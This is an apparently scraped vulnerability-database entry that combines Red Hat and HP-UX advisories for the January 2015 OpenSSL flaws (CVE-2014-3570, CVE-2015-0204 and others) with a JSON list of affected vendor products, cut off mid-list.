x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-perl-1.0.1e-30.el6_6.5.i686.rpm openssl-static-1.0.1e-30.el6_6.5.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm openssl-perl-1.0.1e-30.el6_6.5.ppc64.rpm openssl-static-1.0.1e-30.el6_6.5.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm openssl-perl-1.0.1e-30.el6_6.5.s390x.rpm openssl-static-1.0.1e-30.el6_6.5.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-30.el6_6.5.src.rpm
i386: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-perl-1.0.1e-30.el6_6.5.i686.rpm openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-34.el7_0.7.src.rpm
ppc64: openssl-1.0.1e-34.el7_0.7.ppc64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm openssl-devel-1.0.1e-34.el7_0.7.ppc.rpm openssl-devel-1.0.1e-34.el7_0.7.ppc64.rpm openssl-libs-1.0.1e-34.el7_0.7.ppc.rpm openssl-libs-1.0.1e-34.el7_0.7.ppc64.rpm
s390x: openssl-1.0.1e-34.el7_0.7.s390x.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm openssl-devel-1.0.1e-34.el7_0.7.s390.rpm openssl-devel-1.0.1e-34.el7_0.7.s390x.rpm openssl-libs-1.0.1e-34.el7_0.7.s390.rpm openssl-libs-1.0.1e-34.el7_0.7.s390x.rpm
x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm openssl-perl-1.0.1e-34.el7_0.7.ppc64.rpm openssl-static-1.0.1e-34.el7_0.7.ppc.rpm openssl-static-1.0.1e-34.el7_0.7.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm openssl-perl-1.0.1e-34.el7_0.7.s390x.rpm openssl-static-1.0.1e-34.el7_0.7.s390.rpm openssl-static-1.0.1e-34.el7_0.7.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-3570 https://access.redhat.com/security/cve/CVE-2014-3571 https://access.redhat.com/security/cve/CVE-2014-3572 https://access.redhat.com/security/cve/CVE-2014-8275 https://access.redhat.com/security/cve/CVE-2015-0204 https://access.redhat.com/security/cve/CVE-2015-0205 https://access.redhat.com/security/cve/CVE-2015-0206 https://access.redhat.com/security/updates/classification/#moderate https://www.openssl.org/news/secadv_20150108.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFUwCWMXlSAg2UNWIIRAioBAJ4/RjG4OGXzCwg+PJJWNqyvahe3rQCeNE+X ENFobdxQdJ+gVAiRe8Qf54A= =wyAg -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . These vulnerabilities could be exploited remotely to create a remote Denial of Service (DoS) and other vulnerabilites.
References:
CVE-2014-8275 Cryptographic Issues (CWE-310) CVE-2014-3569 Remote Denial of Service (DoS) CVE-2014-3570 Cryptographic Issues (CWE-310) CVE-2014-3571 Remote Denial of Service (DoS) CVE-2014-3572 Cryptographic Issues (CWE-310) CVE-2015-0204 Cryptographic Issues (CWE-310) SSRT101885
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The updates are available from either of the following sites:
ftp://sl098ze:Secure12@h2.usa.hp.com
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber =OPENSSL11I
HP-UX Release HP-UX OpenSSL depot name
B.11.11 (11i v1) OpenSSL_A.00.09.08ze.001_HP-UX_B.11.11_32_64.depot
B.11.23 (11i v2) OpenSSL_A.00.09.08ze.002_HP-UX_B.11.23_IA-PA.depot
B.11.31 (11i v3) OpenSSL_A.00.09.08ze.003_HP-UX_B.11.31_IA-PA.depot
MANUAL ACTIONS: Yes - Update
Install OpenSSL A.00.09.08ze or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201501-0442", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "powerlinux 7r2", "scope": "eq", "trust": 1.2, "vendor": "ibm", "version": "0" }, { "model": "communications core session manager", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "7.3.5" }, { "model": "communications core session manager", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "7.2.5" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "0.9.8zc" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "power", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "7200" }, { "model": "power", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "7700" }, { "model": "power", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "7800" }, { "model": "power", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "7100" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(arm) 4.1" }, { "model": "sparc enterprise m3000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(arm) 4.3" }, { "model": "ip38x/fw120", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "rev.11.03.08 before" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.9.5" }, { "model": "sparc enterprise m5000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "agent 8.0" }, { "model": "sparc enterprise m9000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 4.2" }, { "model": "xcp", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "2260" }, { "model": "sparc enterprise m4000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 5.0" }, { "model": "ip38x/sr100", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all revisions" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.8.5" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 4.63" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle mobile security suite mss 3.0" }, { "model": "solaris", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "11.2" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 4.71" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "agent 8.0 2007 update release 2" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0 r3" }, { "model": "ip38x/3000", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all revisions" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.0p" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0 r2" }, { "model": "ip38x/58i", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all revisions" }, { "model": "solaris", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "10" }, { "model": "hp icewall mcrp", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "3.0" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1" }, { "model": "xcp", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "(sparc enterprise m3000/m4000/m5000/m8000/m9000 server )" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.0" }, { "model": "ip38x/1200", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all revisions" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 4.1" }, { "model": "mysql", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.6.22 and earlier" }, { "model": "ip38x/3500", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all revisions" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 4.4" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(arm) 4.4" }, { "model": "ip38x/n500", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all revisions" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0 r1" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(arm) 4.2" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 10.0" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 4.3" }, { "model": "ip38x/1210", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all revisions" }, { "model": "xcp", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "1120" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 5.1" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.10 to 10.10.2" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.1k" }, { "model": "hp icewall mcrp", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "2.1" }, { "model": "xcp", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "(fujitsu m10-1/m10-4/m10-4s server )" }, { "model": "sparc enterprise m8000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "ip38x/5000", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all revisions" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 5.1" }, { "model": "ip38x/810", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "rev.11.01.21 before" }, { "model": "power", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7400" }, { "model": "power express", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "5200" }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "power", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "5700" }, { "model": "power", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7300" }, { "model": "powerlinux 7r1", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "7.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.5" }, { "model": "mate collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7600" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.60" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.1" }, { "model": "bladecenter advanced management module 25r5778", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "power system s822", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "es750", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4.1" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1948" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.00" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5205635" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.6" }, { "model": "upward integration modules scvmm add-in", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.80" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flex system p270 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7954-24x)0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22025850" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "6" }, { "model": "power systems e870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "sbr carrier", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.4" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.50" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.3" }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.1" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355042540" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "idataplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79120" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2.2" }, { "model": "norman shark industrial control system protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.1" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "85100" }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.2.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "packetshaper s-series", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.0" }, { "model": "one-x client enablement services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "cms", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "17.0" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.2" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.0p", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "systems insight manager 7.3.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "flex system p260 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-23x)0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "junos os 13.3r6", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli netcool/reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4.19" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70104.1" }, { "model": "proxyav", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.5" }, { "model": "prime security manager 04.8 qa08", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.70" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.21" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "norman shark scada protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.0" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "cognos planning interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.1.4" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7" }, { "model": "project openssl 0.9.8zb", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "netscaler t1", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.0-68" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355041980" }, { "model": "power systems 350.c0", 